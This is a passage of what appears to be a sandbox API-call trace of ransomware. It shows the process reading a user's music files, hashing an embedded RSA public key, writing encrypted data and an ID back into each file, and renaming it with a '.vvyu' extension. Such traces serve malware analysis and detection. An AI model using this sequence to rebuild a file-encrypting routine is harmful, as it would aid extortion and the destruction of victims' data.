hHeap=0x6a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0190.114] GetCurrentThreadId () returned 0x264 [0190.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d442d0 [0190.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0190.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.115] GetCurrentThreadId () returned 0x264 [0190.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0190.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c829b0 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b20 [0190.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ac0 [0190.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0190.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ad8 [0190.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39aa8 [0190.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b38 [0190.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0190.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b08 [0190.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39af0 [0190.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b50 [0190.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0190.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39af0 [0190.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0190.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0190.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ac0 [0190.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0190.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0190.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0190.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0190.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0190.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0190.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0190.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0190.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39570 | out: hHeap=0x6a0000) returned 1 [0190.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.129] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x1659b, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x1659b, lpOverlapped=0x0) returned 1 [0190.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.131] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x165a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.131] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd28 [0190.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd28 | out: hHeap=0x6a0000) returned 1 [0190.133] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.133] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.133] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.133] CloseHandle (hObject=0x584) returned 1 [0190.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0190.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0190.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0190.136] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\I_smja7ZftD 88.wav" (normalized: "c:\\users\\keecfmwgj\\music\\pe 0cuon\\i_smja7zftd 88.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\I_smja7ZftD 88.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\pe 0cuon\\i_smja7zftd 88.wav.vvyu")) returned 1 [0190.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.139] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x723d10 | out: hHeap=0x6a0000) returned 1 [0190.143] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce5593a0, ftCreationTime.dwHighDateTime=0x1d89cb8, ftLastAccessTime.dwLowDateTime=0x1afeb970, ftLastAccessTime.dwHighDateTime=0x1d89eda, ftLastWriteTime.dwLowDateTime=0x1afeb970, ftLastWriteTime.dwHighDateTime=0x1d89eda, nFileSizeHigh=0x0, nFileSizeLow=0x9b09, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jrz5Y.mp3", cAlternateFileName="")) returned 1 [0190.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x723d10 [0190.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.143] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\jrz5Y.mp3") returned=".mp3" [0190.144] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\jrz5Y.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\pe 0cuon\\jrz5y.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.145] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=39689) returned 1 [0190.145] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.150] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9ae3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.150] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.153] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.153] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x9b09, lpOverlapped=0x0) returned 1 [0190.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.154] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0190.155] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.155] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.155] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.155] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.155] GetLastError () returned 0x0 [0190.155] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.155] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0190.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.156] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.156] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.156] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9b10) returned 0x2d45778 [0190.156] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39570 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a90 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d395b8 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39aa8 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ad8 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b38 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39af0 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 